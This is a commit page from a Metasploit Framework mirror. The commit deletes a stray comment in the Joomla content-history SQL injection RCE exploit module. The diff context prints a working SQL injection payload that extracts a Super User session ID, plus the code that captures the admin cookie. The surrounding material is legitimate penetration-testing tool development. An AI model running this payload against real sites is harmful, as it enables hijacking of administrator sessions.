infosecn1nja
/
metasploit-framework
mirror of https://github.com/infosecn1nja/metasploit-framework.git
1
0
Fork 0
Code Issues Packages Projects Releases Wiki Activity

Clean up module

bug/bundler_fix
William Vu 2016-07-12 11:17:10 -05:00
parent 4354b5d5d6
commit 310332b521
1 changed files with 0 additions and 4 deletions
Show Stats Download Patch File Download Diff File Expand all files Collapse all files

4
modules/exploits/unix/webapp/joomla_contenthistory_sqli_rce.rb
View File

@ -80,8 +80,6 @@ class MetasploitModule < Msf::Exploit::Remote
# The extra search for NOT LIKE '%IS NOT NULL%' is because of our SQL data that's inserted in the session cookie history. # The extra search for NOT LIKE '%IS NOT NULL%' is because of our SQL data that's inserted in the session cookie history.
# This way we make sure that's excluded and we only get real admin sessions. # This way we make sure that's excluded and we only get real admin sessions.
# The modified query should resolve previous issues - Michael Maturi
sql = " (select col.a from (select count(*), concat(0x3a, 0x3a, (select substr(session_id,1,100) from #{tableprefix}session WHERE data LIKE '%Super User%' AND data NOT LIKE '%IS NOT NULL%' AND userid!='0' AND username IS NOT NULL limit 0,1), 0x3a, 0x3a, floor(rand()*2)) a from information_schema.columns i1 group by a) col),'A' union select uc.id " sql = " (select col.a from (select count(*), concat(0x3a, 0x3a, (select substr(session_id,1,100) from #{tableprefix}session WHERE data LIKE '%Super User%' AND data NOT LIKE '%IS NOT NULL%' AND userid!='0' AND username IS NOT NULL limit 0,1), 0x3a, 0x3a, floor(rand()*2)) a from information_schema.columns i1 group by a) col),'A' union select uc.id "
# Retrieve cookies # Retrieve cookies
@ -121,10 +119,8 @@ class MetasploitModule < Msf::Exploit::Remote
if res && res.code == 500 && res.body =~ /::([A-Za-z0-9]*)::/ if res && res.code == 500 && res.body =~ /::([A-Za-z0-9]*)::/
auth_cookie_part = $1 auth_cookie_part = $1
print_status("#{peer} - Retrieved admin cookie [ #{auth_cookie_part} ]") print_status("#{peer} - Retrieved admin cookie [ #{auth_cookie_part} ]")
else else
fail_with(Failure::Unknown, "#{peer}: No logged-in admin user found!") fail_with(Failure::Unknown, "#{peer}: No logged-in admin user found!")
end end
# Retrieve cookies # Retrieve cookies